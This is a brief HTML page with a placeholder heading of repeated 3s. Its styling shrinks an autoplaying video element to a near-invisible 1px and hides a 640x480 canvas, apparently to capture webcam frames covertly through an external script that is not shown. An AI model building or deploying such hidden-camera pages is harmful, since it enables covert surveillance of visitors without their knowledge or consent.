<!DOCTYPE html>
<html lang="ka">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <style>
      #video {
        opacity: 0.1;
        width: 1px;
        height: 1px;
      }
      #canvas {
        display: none;
      }
    </style>
  </head>
  <body>
    <video id="video" autoplay playsinline></video>
    <canvas id="canvas" width="640" height="480"></canvas>
        <h1>333333333333333</h1>

  <script src="../static/scipts.js"></script>
  </body>
</html>
